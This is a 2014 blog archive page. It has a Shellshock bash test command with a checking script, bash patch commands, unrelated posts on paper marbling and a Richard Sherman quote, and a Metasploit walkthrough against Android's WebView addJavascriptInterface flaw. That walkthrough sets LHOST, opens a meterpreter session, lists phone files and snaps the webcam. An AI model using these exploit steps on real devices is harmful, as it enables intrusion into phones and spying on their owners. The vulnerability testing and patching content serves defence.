Archive | September, 2014

Testing Shellshock Bug In BASH – CVE-2014-6271 (Exploit 1)

To test for the vulnerability on your *nix systems just issue the following command as any user (doesn’t have to be root):

env testbug='() { :;}; echo VULNERABLE' bash -c "echo completed"

If you see this:

VULNERABLE
completed

it is vulnerable. If bash is patched or otherwise not vulnerable, you should see this instead:

bash: warning: testbug: ignoring function definition attempt
bash: error importing function definition for `testbug'
completed
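The same probe wrapped in a small POSIX sh script, added here as an example and not part of the original post: it runs the command above against a given bash binary in a clean environment and classifies the output the way the two samples above describe (the function names and the "unknown" result for a missing binary are this example's own).

```shell
#!/bin/sh
# Added example: local check for CVE-2014-6271 using the probe from the post.
# classify_shellshock_output: decide from captured bash output.
#   "vulnerable" if the injected echo ran, "patched" if only the real command
#   ran (with or without the import warning), "unknown" otherwise.
classify_shellshock_output() {
    case "$1" in
        *VULNERABLE*) echo vulnerable ;;
        *completed*)  echo patched ;;
        *)            echo unknown ;;
    esac
}

# check_bash [path-to-bash]: run the probe with a minimal environment (env -i)
# so no other exported variable interferes, merge stdout and stderr, and
# classify. Returns 0 only when the binary is classified as patched.
check_bash() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo unknown; return 2; }
    out=$(env -i PATH="$PATH" testbug='() { :;}; echo VULNERABLE' \
          "$bash_bin" -c 'echo completed' 2>&1)
    status=$(classify_shellshock_output "$out")
    echo "$status"
    [ "$status" = patched ]
}

# Check the bash on PATH, or the binary given as the first argument.
check_bash "$@"
```

A second argument-free run on each host in an inventory gives a quick before/after view of the patch rollout.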


Paper Marbling

This must be the least stressful work in the world, seems so satisfying and relaxing. The song is “Charlotte Mittnacht” by DeVotchka.

CVE-2014-6271: remote code execution through bash, time to patch!

“Stephane Chazelas discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name.”

In many common configurations, this vulnerability is exploitable over the network.

This vulnerability is actually really bad and you want to patch any Internet-facing systems ASAP! It allows remote, unauthenticated attackers to run code on vulnerable systems. It scores a 10 on the NVD severity scale: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

The good news is that it’s an easy fix:

Debian (Ubuntu, etc.):

sudo apt-get update
sudo apt-get install --only-upgrade bash

RHEL (Fedora, CentOS, etc.):

sudo yum update bash


Please refer to your operating system vendor’s instructions, for example:


via: http://seclists.org/oss-sec/2014/q3/649


Exploit Android via WebView addJavascriptInterface Code Execution

“What I am going to show you today is that this phone is nominally not vulnerable … can become vulnerable quite easily just downloading fairly popular Apps from Google Play Store” said Tod Beardsley – Pirate Captain for Metasploit Framework, Rapid7. The sound advice of never side loading Apps and always going through the Play Store because it’s ‘safe’ is not always true, case in point:

msfconsole
use exploit/android/browser/webview_addjavascriptinterface
info
show options
set LHOST <ip address>
exploit

By downloading an aftermarket browser from the Google Play Store [in the video the App is called “Marathon Browser”] and viewing a specifically crafted web page, the phone could be hacked and give up a meterpreter session. “Effectively this browser is a backdoor into my phone” explained Beardsley. The situation is critical: nearly 70 percent of Android-based handsets are vulnerable because they run Android versions prior to 4.2.

sessions -i
sessions -i 1
ls 
cd /sdcard

While you only have the permissions of the browser you still have the ability to do a lot with the current user rights of the browser, even using the camera.

webcam_list
webcam_snap 1

“This module exploits a privilege escalation issue in Android < 4.2’s WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView’s HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup).”
source: http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface


Richard Sherman Press Conference Quote and Study Habits – Student of the Game

NFC Championship - San Francisco 49ers v Seattle Seahawks
Postgame Interview quote from Richard Sherman – Jan. 22, 2014 Press Conference after Seahawks won against the 49ers – NFC Championship Game

Whatever beginnings you come from just understand that your circumstances don’t dictate your future. Your circumstances don’t control your limits. You’re limitless, you’re a limitless person, you’re limitless by your faith, your abilities, your trust in yourself, your hard work, you can do as much as you want to do … but to not go out there and work as hard as you can and give yourself the best possible chance to be successful you’re doing yourself a disservice.

Whether it’s football or any other activity, it takes discipline… You need to be a ‘student of the game’[1], whatever your game is! Tape study most likely helped Sherman and the Seahawks defense crack Peyton Manning’s hand signals[2], giving them the ‘best possible chance’ during the 2014 Super Bowl XLVIII.

[1] VIDEO: Richard Sherman – Student of the Game
[2] http://www.businessinsider.com/seahawks-peyton-manning-hand-signals-2014-2


via: http://www.sportsradiokjr.com/articles/the-latest-430702/richard-sherman-press-conference-quotes-jan-11999992/